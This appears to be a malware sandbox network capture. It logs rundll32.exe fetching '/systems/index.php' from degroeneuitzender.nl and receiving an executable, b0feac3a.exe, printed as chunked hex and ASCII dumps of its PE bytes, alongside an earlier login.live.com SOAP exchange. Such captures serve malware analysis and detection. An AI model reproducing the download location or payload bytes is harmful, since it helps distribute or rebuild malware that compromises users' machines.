                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:03 UTC129OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:03 UTC132INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:03 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 2ed4ae4f-5149-4cf8-b65a-9a277c3d372d
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF0000E776 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:02 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:03 UTC133INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    60192.168.2.4499425.135.247.111443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15552OUTGET /systems/index.php HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Host: degroeneuitzender.nl


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    615.135.247.111443192.168.2.449942C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15552INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:18 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Description: File Transfer
                                                                                                                                                                                    Content-Disposition: attachment; filename=b0feac3a.exe
                                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                                    Expires: 0
                                                                                                                                                                                    Cache-Control: must-revalidate
                                                                                                                                                                                    Pragma: public
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15553INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 b7 a1 8c 86 d6 cf df 86 d6 cf df 86 d6 cf df 3b 99 59 df 87 d6 cf df 98 84 5a df 9f d6 cf df 98 84 4c df f9 d6 cf df a1 10 b4 df 83 d6 cf df 86 d6 ce df 05 d6 cf df 98 84 4b df a2 d6 cf df 98 84 5b df 87 d6 cf df 98 84 5e df 87 d6 cf df 52 69 63 68 86 d6 cf df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 53
                                                                                                                                                                                    Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$;YZLK[^RichPELS
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15560INData Raw: 00 00 00 00 00 c0 0a 40 00 00 00 4c 1b 86 f4 3f c3 82 a9 fe e1 7c 2f 3e 00 00 00 00 00 00 0b 40 00 00 00 8c 59 90 f4 3f df fb c0 73 f1 0a 40 3e 00 00 00 00 00 40 0b 40 00 00 00 e0 6b 9a f4 3f d9 f0 c3 92 d2 61 40 3e 00 00 00 00 00 80 0b 40 00 00 00 58 53 a4 f4 3f 78 28 33 fd 9b 75 38 3e 00 00 00 00 00 c0 0b 40 00 00 00 fc 10 ae f4 3f 76 c1 4f 2c 69 62 19 3e 00 00 00 00 00 00 0c 40 00 00 00 c8 a5 b7 f4 3f 1b fe 26 4c cd 92 43 3e 00 00 00 00 00 40 0c 40 00 00 00 b8 12 c1 f4 3f 99 d1 7d 18 e3 fb 4c 3e 00 00 00 00 00 80 0c 40 00 00 00 c0 58 ca f4 3f 4c 6f a2 88 8c b7 13 3e 00 00 00 00 00 c0 0c 40 00 00 00 c0 78 d3 f4 3f 2d d4 1b cf a0 99 39 3e 00 00 00 00 00 00 0d 40 00 00 00 a0 73 dc f4 3f 36 46 49 44 1b 3f 39 3e 00 00 00 00 00 40 0d 40 00 00 00 38 4a e5 f4
                                                                                                                                                                                    Data Ascii: @L?|/>@Y?s@>@@k?a@>@XS?x(3u8>@?vO,ib>@?&LC>@@?}L>@X?Lo>@x?-9>@s?6FID?9>@@8J
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15561INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15561INData Raw: 32 30 30 30 0d 0a 10 49 8f 16 56 09 43 3e 00 00 00 00 00 80 0e 40 00 00 00 60 77 0f f5 3f bb 84 5e 04 40 a5 4e 3e 00 00 00 00 00 c0 0e 40 00 00 00 f8 84 17 f5 3f 87 23 b9 cd 25 aa 40 3e 00 00 00 00 00 00 0f 40 00 00 00 9c 73 1f f5 3f 03 00 96 4d fb 1e 4b 3e 00 00 00 00 00 40 0f 40 00 00 00 00 44 27 f5 3f ce ae b9 51 e5 d4 2d 3e 00 00 00 00 00 80 0f 40 00 00 00 c4 f6 2e f5 3f 39 0b 21 b4 a8 ee 47 3e 00 00 00 00 00 c0 0f 40 00 00 00 94 8c 36 f5 3f 1b 2e a4 c9 cf e9 31 3e 00 00 00 00 00 00 10 40 00 00 00 08 06 3e f5 3f 2e 31 07 91 4e 63 42 3e 00 00 00 00 00 20 10 40 00 00 00 c0 63 45 f5 3f 15 e2 73 c7 94 87 31 3e 00 00 00 00 00 40 10 40 00 00 00 4c a6 4c f5 3f 02 87 6e e8 48 7f 4e 3e 00 00 00 00 00 60 10 40 00 00 00 48 ce 53 f5 3f a9 57 13 98 ec 08 24 3e 00
                                                                                                                                                                                    Data Ascii: 2000IVC>@`w?^@N>@?#%@>@s?MK>@@D'?Q->@.?9!G>@6?.1>@>?.1NcB> @cE?s1>@@LL?nHN>`@HS?W$>
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15569INData Raw: 3d 81 6d 2c db 66
                                                                                                                                                                                    Data Ascii: =m,f
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15569INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15569INData Raw: 32 30 30 30 0d 0a 3b 70 8b 45 78 8b 4d 7c 31 08 83 c5 70 c9 c2 08 00 55 8b ec 8b 4d 08 8b 01 89 45 08 8b 45 0c 01 45 08 8b 45 08 89 01 5d c2 08 00 c2 08 00 55 8b ec 83 ec 20 8b 45 0c 8b 08 89 4d e8 8b 48 04 53 8b 5d 08 56 8b 73 04 89 4d e4 8b 48 08 8b 40 0c 57 8b 3b c7 45 fc 20 37 ef c6 c7 45 e0 b9 79 37 9e 89 4d f0 89 45 ec c7 45 f4 20 00 00 00 8b c7 c1 e0 04 03 45 f0 89 45 0c 8b 45 fc 8d 0c 38 8b c7 c1 e8 05 89 45 08 8b 45 ec 01 45 08 51 8d 45 0c 50 c7 05 44 2c 49 00 fc 03 cf ff e8 e1 f8 ff ff 8b 45 08 33 45 0c ff 75 e4 83 25 44 2c 49 00 00 83 0d 4c 2c 49 00 ff 2b f0 8b c6 c1 e0 04 03 45 e8 c7 05 48 2c 49 00 19 36 6b ff 89 45 0c 8b 45 fc 8d 14 30 8b c6 c1 e8 05 89 45 08 8d 45 08 50 e8 2b ff ff ff 52 8d 45 0c 50 e8 92 f8 ff ff 8b 45 0c 33 45 08 83 65 f8
                                                                                                                                                                                    Data Ascii: 2000;pExM|1pUMEEEE]U EMHS]VsMH@W;E 7Ey7MEE EEE8EEEQEPD,IE3Eu%D,IL,I+EH,I6kEE0EEP+REPE3Ee
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15577INData Raw: e1 ff ff 0f 00 46
                                                                                                                                                                                    Data Ascii: F
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15577INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15577INData Raw: 32 30 30 30 0d 0a 0b c1 75 05 89 55 ec eb 0d c7 45 ec fe 03 00 00 eb 04 c6 06 31 46 8b c6 46 89 45 0c 39 55 14 75 04 88 10 eb 0f 8b 4d dc 8b 89 bc 00 00 00 8b 09 8a 09 88 08 8b 4f 04 8b 07 81 e1 ff ff 0f 00 89 4d f8 77 08 3b c2 0f 86 b5 00 00 00 89 55 f4 c7 45 f8 00 00 0f 00 83 7d 14 00 7e 4d 8b 57 04 23 55 f8 8b 07 0f bf 4d fc 23 45 f4 81 e2 ff ff 0f 00 e8 0a 61 00 00 66 83 c0 30 0f b7 c0 66 83 f8 39 76 02 03 c3 8b 4d f8 83 6d fc 04 88 06 8b 45 f4 0f ac c8 04 c1 e9 04 46 ff 4d 14 66 83 7d fc 00 89 45 f4 89 4d f8 7d ad 66 83 7d fc 00 7c 51 8b 57 04 23 55 f8 8b 07 0f bf 4d fc 23 45 f4 81 e2 ff ff 0f 00 e8 b6 60 00 00 66 83 f8 08 76 31 8d 46 ff 8a 08 80 f9 66 74 05 80 f9 46 75 06 c6 00 30 48 eb ee 3b 45 0c 74 14 8a 08 80 f9 39 75 07 80 c3 3a 88 18 eb 09 fe
                                                                                                                                                                                    Data Ascii: 2000uUE1FFE9UuMOMw;UE}~MW#UM#Eaf0f9vMmEFMf}EM}f}|QW#UM#E`fv1FftFu0H;Et9u:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15585INData Raw: 04 fe ff ff 83 c0
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15585INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15585INData Raw: 32 30 30 30 0d 0a 04 89 85 1c fe ff ff eb 02 33 f6 32 db 89 b5 44 fe ff ff 38 9d 73 fe ff ff 75 18 8a 07 3c 53 74 0b c6 85 73 fe ff ff ff 3c 43 75 07 c6 85 73 fe ff ff 01 0f b6 07 83 c8 20 89 85 5c fe ff ff 83 f8 6e 74 4a 83 f8 63 74 19 83 f8 7b 74 14 ff b5 64 fe ff ff 8d b5 74 fe ff ff e8 7d fc ff ff 59 eb 11 8b 95 64 fe ff ff ff 85 74 fe ff ff e8 40 fc ff ff 89 85 78 fe ff ff 83 f8 ff 0f 84 d1 0b 00 00 8b b5 44 fe ff ff 8b bd 48 fe ff ff 8b 8d 4c fe ff ff 85 c9 74 0d 83 bd 6c fe ff ff 00 0f 84 84 0b 00 00 8b 85 5c fe ff ff 83 f8 6f 0f 8f 72 05 00 00 0f 84 01 08 00 00 83 f8 63 0f 84 0a 04 00 00 6a 64 5a 3b c2 0f 84 ed 07 00 00 0f 8e 7a 05 00 00 83 f8 67 7e 45 83 f8 69 74 21 83 f8 6e 0f 85 67 05 00 00 80 bd 6a fe ff ff 00 8b bd 74 fe ff ff 0f 84 66 0a 00
                                                                                                                                                                                    Data Ascii: 200032D8su<Sts<Cus \ntJct{tdt}Ydt@xDHLtl\orcjdZ;zg~Eit!ngjtf
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15593INData Raw: 0f 94 c1 8b d1 40
                                                                                                                                                                                    Data Ascii: @
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15593INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15593INData Raw: 32 30 30 30 0d 0a 40 eb db 66 83 f9 20 77 0a 40 40 0f b7 08 66 85 c9 75 f0 c3 8b ff 56 8b 35 c0 34 49 00 57 33 ff 85 f6 75 1a 83 c8 ff e9 ac 00 00 00 66 83 f8 3d 74 01 47 56 e8 c0 57 00 00 59 8d 74 46 02 0f b7 06 66 85 c0 75 e6 53 6a 04 47 57 e8 21 3a 00 00 8b d8 59 59 89 1d f4 34 49 00 85 db 75 05 83 c8 ff eb 74 8b 35 c0 34 49 00 eb 44 56 e8 88 57 00 00 8b f8 47 66 83 3e 3d 59 74 31 6a 02 57 e8 ee 39 00 00 59 59 89 03 85 c0 74 50 56 57 50 e8 f7 56 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 6e b7 ff ff 83 c4 14 83 c3 04 8d 34 7e 66 83 3e 00 75 b6 ff 35 c0 34 49 00 e8 88 cf ff ff 83 25 c0 34 49 00 00 83 23 00 c7 05 38 40 49 00 01 00 00 00 33 c0 59 5b 5f 5e c3 ff 35 f4 34 49 00 e8 62 cf ff ff 83 25 f4 34 49 00 00 83 c8 ff eb e4 8b ff 55 8b ec 51 56
                                                                                                                                                                                    Data Ascii: 2000@f w@@fuV54IW3uf=tGVWYtFfuSjGW!:YY4Iut54IDVWGf>=Yt1jW9YYtPVWPVt3PPPPPn4~f>u54I%4I#8@I3Y[_^54Ib%4IUQV
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15601INData Raw: e1 8b 4d 0c 0b cf
                                                                                                                                                                                    Data Ascii: M
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15601INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15601INData Raw: 32 30 30 30 0d 0a 5f 5e 66 89 48 08 5b c9 c3 8b ff 55 8b ec 83 ec 30 a1 98 8e 47 00 33 c5 89 45 fc 8b 45 14 53 8b 5d 10 56 89 45 d0 57 8d 45 08 50 8d 45 f0 50 e8 18 ff ff ff 59 59 8d 45 d4 50 6a 00 6a 11 83 ec 0c 8d 75 f0 8b fc a5 a5 66 a5 e8 99 54 00 00 8b 75 d0 89 43 08 0f be 45 d6 89 03 0f bf 45 d4 89 43 04 8d 45 d8 50 ff 75 18 56 e8 b6 fd ff ff 83 c4 24 85 c0 74 0f 33 c0 50 50 50 50 50 e8 92 97 ff ff 83 c4 14 8b 4d fc 5f 89 73 0c 5e 8b c3 33 cd 5b e8 be eb ff ff c9 c3 cc cc cc cc cc cc cc 57 56 55 33 ff 33 ed 8b 44 24 14 0b c0 7d 15 47 45 8b 54 24 10 f7 d8 f7 da 83 d8 00 89 44 24 14 89 54 24 10 8b 44 24 1c 0b c0 7d 14 47 8b 54 24 18 f7 d8 f7 da 83 d8 00 89 44 24 1c 89 54 24 18 0b c0 75 28 8b 4c 24 18 8b 44 24 14 33 d2 f7 f1 8b d8 8b 44 24 10 f7 f1 8b
                                                                                                                                                                                    Data Ascii: 2000_^fH[U0G3EES]VEWEPEPYYEPjjufTuCEECEPuV$t3PPPPPM_s^3[WVU33D$}GET$D$T$D$}GT$D$T$u(L$D$3D$
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15609INData Raw: 57 8b 7d 08 8b c7
                                                                                                                                                                                    Data Ascii: W}
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15609INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15609INData Raw: 31 66 66 38 0d 0a c1 f8 05 8d 34 85 60 40 49 00 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 77 79 ff ff 33 f6 89 30 e8 5b 79 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 e3 78 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 7e fd ff ff 83 c4 10 ff 75 08 e8 0f fd ff ff 59 85 c0 0f 84 9d 02 00 00 8b 06 f6 44 07 04 80 0f 84 90 02 00 00 e8 c6 c5 ff ff 8b 40 6c 33 c9 39 48 14 8d 85 1c e5 ff ff 0f 94 c1 50 8b 06 ff 34 07 89 8d 20 e5 ff ff ff 15 88 11 40 00 85 c0 0f 84 60 02 00 00 33 c9 39 8d 20 e5 ff ff 74 08 84 db 0f 84 50 02 00 00 ff 15 84 11 40 00 8b 9d 34 e5 ff ff 89 85 1c e5 ff ff 33 c0 89 85 3c e5 ff ff 39 45 10 0f 86 42 05
                                                                                                                                                                                    Data Ascii: 1ff84`@IX$('tu0Mu&wy30[yVVVVVxC@ tjjju~uYD@l39HP4 @`39 tP@43<9EB
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15617INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15617INData Raw: ff ff ff 76 64 e8 46 70 ff ff ff 76 68 e8 3e 70 ff ff ff 76 6c e8 36 70 ff ff ff 76 70 e8 2e 70 ff ff ff 76 74 e8 26 70 ff ff ff 76 78 e8 1e 70 ff ff ff 76 7c e8 16 70 ff ff 83 c4 40 ff b6 80 00 00 00 e8 08 70 ff ff ff b6 84 00 00 00 e8 fd 6f ff ff ff b6 88 00 00 00 e8 f2 6f ff ff ff b6 8c 00 00 00 e8 e7 6f ff ff ff b6 90 00 00 00 e8 dc 6f ff ff ff b6 94 00 00 00 e8 d1 6f ff ff ff b6 98 00 00 00 e8 c6 6f ff ff ff b6 9c 00 00 00 e8 bb 6f ff ff ff b6 a0 00 00 00 e8 b0 6f ff ff ff b6 a4 00 00 00 e8 a5 6f ff ff ff b6 a8 00 00 00 e8 9a 6f ff ff 83 c4 2c 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 74 35 8b 06 3b 05 c8 98 47 00 74 07 50 e8 77 6f ff ff 59 8b 46 04 3b 05 cc 98 47 00 74 07 50 e8 65 6f ff ff 59 8b 76 08 3b 35 d0 98 47 00 74 07 56 e8 53 6f ff ff 59 5e
                                                                                                                                                                                    Data Ascii: vdFpvh>pvl6pvp.pvt&pvxpv|p@poooooooooo,^]UVut5;GtPwoYF;GtPeoYv;5GtVSoY^
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15625INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15625INData Raw: 32 30 30 30 0d 0a 00 00 00 8b d8 e8 0a fe ff ff 0f b7 c0 89 45 fc d9 6d fc 9b d9 7d fc 8b 5d fc 33 d2 f6 c3 01 74 03 6a 10 5a f6 c3 04 74 03 83 ca 08 f6 c3 08 74 03 83 ca 04 f6 c3 10 74 03 83 ca 02 f6 c3 20 74 03 83 ca 01 f6 c3 02 74 06 81 ca 00 00 08 00 0f b7 cb 8b c1 23 c6 74 28 3d 00 04 00 00 74 1b 3d 00 08 00 00 74 0c 3b c6 75 16 81 ca 00 03 00 00 eb 0e 81 ca 00 02 00 00 eb 06 81 ca 00 01 00 00 81 e1 00 03 00 00 74 10 81 f9 00 02 00 00 75 0e 81 ca 00 00 01 00 eb 06 81 ca 00 00 02 00 f7 c3 00 10 00 00 74 06 81 ca 00 00 04 00 89 55 0c 8b c2 33 f6 39 35 8c 51 49 00 0f 84 8d 01 00 00 81 e7 1f 03 08 03 89 7d ec 0f ae 5d f0 8b 45 f0 84 c0 79 03 6a 10 5e a9 00 02 00 00 74 03 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00
                                                                                                                                                                                    Data Ascii: 2000Em}]3tjZttt tt#t(=t=t;ututU395QI}]Eyj^ttt
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15633INData Raw: 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15633INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15633INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15641INData Raw: ff ff 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15641INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15641INData Raw: 32 30 30 30 0d 0a fe ff ff ff 00 00 00 00 7d e9 40 00 00 00 00 00 00 00 00 00 49 e9 40 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 87 eb 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 96 f3 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 19 f4 40 00 30 f4 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff cb f6 40 00 df f6 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 15 fd 40 00 19 fd 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 60 fe 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 c0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 4d 00 41 00 00 00 00 00 fe
                                                                                                                                                                                    Data Ascii: 2000}@I@@@@0@@@@@`@MA
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15649INData Raw: 7a 05 00 bb 57 dc
                                                                                                                                                                                    Data Ascii: zW
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15649INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15649INData Raw: 32 30 30 30 0d 0a 41 13 94 4a 5b e5 f5 50 c9 f4 3e 5f 92 88 fa dc 80 53 12 98 03 6a 3d 91 c4 c4 6f 3c d0 23 e0 22 8d 0d 7a 05 00 bb 57 dc 26 e4 02 b2 fb c8 d5 71 bf d2 7d 9a d1 7c 1f bd e9 8a 98 f0 8d d2 ea cc a1 71 dc 9b 1f cb 6b 2d ab f9 98 79 f1 3c 24 e1 c2 b6 03 0e 45 1c aa 1d 6b b9 92 67 33 37 73 73 5f a3 b8 7f e7 0d b8 23 b9 e1 c9 ff 1d f8 4c 84 36 5c 06 72 90 f2 e1 3a cc 6e 56 ac e1 94 91 02 6b b9 92 67 33 37 73 73 c6 4b e1 b6 45 f4 62 48 b9 e1 c9 ff 1d f8 4c 84 93 2d c9 0e 92 9d 62 58 70 79 c8 e9 98 5f 06 79 5d 2c 9d 24 b9 d5 9c e4 9d c1 d4 84 48 be dc 8e 0a 4b 6e cf 8a d0 72 09 82 98 8d a0 47 72 76 40 10 06 a3 99 40 bf 6a 77 51 cc 27 cc f3 b7 d1 81 b0 b8 eb 6b b1 d0 b8 ec 3b 56 61 a7 b5 ed 90 dd 82 98 8d a0 47 72 76 40 b8 ba 1d 13 fb 8b c8 c5 71
                                                                                                                                                                                    Data Ascii: 2000AJ[P>_Sj=o<#"zW&q}|qk-y<$Ekg37ss_#L6\r:nVkg37ssKEbHL-bXpy_y],$HKnrGrv@@jwQ'k;VaGrv@q
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15657INData Raw: e8 c3 68 e8 bb df
                                                                                                                                                                                    Data Ascii: h
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15657INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
